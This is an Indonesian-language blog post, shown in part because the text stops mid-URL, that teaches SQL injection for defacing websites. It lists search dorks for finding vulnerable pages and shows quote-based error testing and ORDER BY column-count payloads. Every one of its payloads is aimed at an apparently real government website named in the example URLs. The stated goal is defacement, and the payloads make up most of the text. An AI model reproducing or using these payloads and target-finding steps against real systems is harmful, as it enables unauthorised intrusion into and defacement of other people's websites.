Posts

Showing posts from February, 2019

tutorial deface sql injection

Image
Pada Tutorial Kali ini ,Saya akan Share Tutorial Deface Sql Manual dork :  - inurl:/staff.php?id= - inurl:/news.php?id= kembangin sendiri gan. Nah Langsung Aja Karena Saya Udah Nemu Situs Yang Vuln Sql ,Oh iya Untuk Mengetahui Vuln Atau Tidak Kalian Hanya Perlu Masukan tanda ( ' ) di belakang angka Id nya, Contoh : http://www.utama.tegalkab.go.id/artikel.php?id=113' Nah Kek gitu deh, maka muncul  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 jika sudah ketemu ,kalian tinggal masukan +order+by+1--+- ,Jadinya : http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+1--+- Kalian Terusin Sampai Ketemu Error ,jadinya http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+1--+- => Ga error http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+2--+- Ga error http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+